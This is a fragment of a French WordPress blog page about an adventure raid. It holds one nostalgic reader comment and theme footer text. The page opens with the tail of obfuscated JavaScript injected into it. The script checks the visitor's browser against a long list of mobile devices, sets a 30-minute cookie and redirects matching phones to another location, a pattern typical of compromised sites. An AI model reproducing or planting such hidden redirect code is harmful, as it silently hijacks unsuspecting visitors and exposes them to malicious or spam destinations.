-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Written by Team in: Raid | Étiquettes :

Un commentaire »

  • Annick dit :

    Enormes souvenirs chargés d’adrénaline, de sueur, de galères, de rires…et déjà l’envie d’en refaire un!!!!

RSS feed for comments on this post. TrackBack URL


Leave a Reply

Sidead Sidead

Design: TheBuckmaker.com WordPress Themes